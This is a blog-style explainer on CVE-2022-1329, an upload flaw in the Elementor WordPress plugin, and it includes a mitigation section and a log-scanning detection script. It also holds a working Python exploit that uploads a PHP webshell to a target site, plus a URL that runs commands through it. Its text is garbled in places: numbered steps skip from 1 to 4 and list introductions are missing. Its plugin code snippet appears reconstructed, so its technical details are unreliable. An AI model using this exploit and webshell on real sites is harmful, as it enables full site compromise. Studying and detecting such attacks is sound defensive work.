In today’s post, we’ll dive deep into CVE-2022-1329, a severe vulnerability in the very popular Elementor Website Builder WordPress plugin. This flaw allowed attackers to bypass authentication, exploit insecure AJAX endpoints, modify site data, and even upload malicious files leading to full remote code execution (RCE), putting millions of WordPress sites at risk between versions 3.6.0 and 3.6.2.
This is an exclusive, step-by-step breakdown, including references, code snippets, technical explanation, and demonstration of exploitation – written in simple, accessible language.
What Is CVE-2022-1329?
CVE-2022-1329 is a vulnerability discovered in April 2022 affecting the Elementor plugin, particularly its AJAX handling in /core/app/modules/onboarding/module.php. This flaw was caused by *missing capability checks* before executing sensitive actions. In simple terms: Elementor didn’t properly check if a user actually had permission before allowing them to use some powerful tools under the hood.
- Perform sensitive site changes
- Upload arbitrary/malicious files
The Root Cause: Missing Capability Check
The Elementor plugin registered several AJAX actions for onboarding users. These AJAX functions were accessible by unauthenticated users because they didn’t check for the right WordPress capability (such as manage_options or edit_posts). So anyone – even someone not logged in – could call these functions via a simple HTTP request.
In core/app/modules/onboarding/module.php:

```php
add_action( 'wp_ajax_elementor_onboarding_upload_file', [ $this, 'onboarding_upload_file' ] );
add_action( 'wp_ajax_nopriv_elementor_onboarding_upload_file', [ $this, 'onboarding_upload_file' ] ); // <--- PROBLEM!
```

No capability check is performed in onboarding_upload_file:

```php
public function onboarding_upload_file() {
    // NO current_user_can() check
    // Process file upload
    // ...
}
```
This means anyone (not just logged-in admins, but any visitor) can fire off POST requests to execute this function.
How Exploitation Works
1. Attacker crafts a malicious AJAX call, sending a POST request to the onboarding file upload endpoint.
The file is written to the server in a web-accessible location.
4. Attacker accesses the shell through the browser, gaining control of the site/server.
Here’s a simple Python script to exploit this vulnerability and upload a webshell:

```python
import requests

url = "https://victim.com/wp-admin/admin-ajax.php?action=elementor_onboarding_upload_file"
files = {
    'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}
response = requests.post(url, files=files)
print("Status:", response.status_code)
print("Response body:", response.text)
```
This script uploads a PHP file containing a simple shell. Once uploaded, the attacker can execute shell commands by accessing:
https://victim.com/wp-content/uploads/onboarding/shell.php?cmd=whoami
- Alter site data: AJAX actions allowed for modification of various site options and content.
- Upload arbitrary files: Often leading to code execution (RCE), defacement, spam, or total site compromise.
- Install backdoors or full webshells, persistently controlling the site and using it for further attacks.
Patching and Mitigation
The Elementor team reacted quickly by fixing the issue in version 3.6.3. They added capability checks to all affected endpoints.
- Replace all admin passwords
- Scan your site for malware (using plugins like Wordfence or Sucuri)
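Beyond a malware scan, you can check web-server access logs for the two traces this attack leaves: a call to the onboarding upload endpoint, and a PHP file being served out of wp-content/uploads. The following is an added example, not code from the original post or from Elementor; it assumes "combined" log format and uses constructed sample lines:

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/Nginx "combined" format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Apr/2022:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=elementor_onboarding_upload_file HTTP/1.1" 200 512 "-" "python-requests/2.27.1"
203.0.113.7 - - [19/Apr/2022:10:01:05 +0000] "GET /wp-content/uploads/onboarding/shell.php?cmd=whoami HTTP/1.1" 200 20 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Apr/2022:10:02:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 100 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Apr/2022:10:02:10 +0000] "GET /wp-content/uploads/2022/04/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ACTION = "elementor_onboarding_upload_file"
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")

def classify(line):
    """Return (ip, timestamp, reason) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # Only visible when the action is passed in the query string, as in the
    # exploit above; an action sent only in the POST body needs WAF/app logs.
    if url.path.endswith("/wp-admin/admin-ajax.php") and \
            UPLOAD_ACTION in parse_qs(url.query).get("action", []):
        return (m["ip"], m["ts"], "call to onboarding upload endpoint")
    # Serving a script straight out of the uploads tree is the
    # post-exploitation step; uploads should never execute scripts at all.
    if "/wp-content/uploads/" in url.path and url.path.lower().endswith(SCRIPT_EXTS):
        return (m["ip"], m["ts"], "script executed from uploads directory")
    return None

def scan(log_text):
    """All suspicious findings, in log order."""
    return [f for f in map(classify, log_text.splitlines()) if f]

def correlate(log_text):
    """IPs that hit the upload endpoint and later ran a script from uploads."""
    uploaders, confirmed = set(), []
    for ip, _ts, reason in scan(log_text):
        if reason.startswith("call to onboarding"):
            uploaders.add(ip)
        elif ip in uploaders and ip not in confirmed:
            confirmed.append(ip)
    return confirmed

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
    print("likely compromised by:", correlate(SAMPLE_LOG))
```

A hit on the second rule alone is worth investigating regardless of this CVE, since a correctly configured uploads directory never executes PHP.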
References and Further Reading
- Wordfence Advisory: Unauthenticated RCE in Elementor (CVE-2022-1329)
- NIST NVD - CVE-2022-1329
- Patchstack Database Entry
Summary
CVE-2022-1329 is a classic example of missing authorization in web applications, with devastating results. The Elementor plugin’s oversight in protecting its AJAX actions made millions of WordPress sites vulnerable to complete takeover. The key takeaway: always update plugins promptly, use security solutions, and never trust input from unauthenticated sources.
Check your site, update Elementor, and stay safe!
Do you have questions or want to know more about WordPress plugin security? Leave a comment below!
Timeline
Published on: 04/19/2022 21:15:00 UTC
Last modified on: 04/27/2022 17:33:00 UTC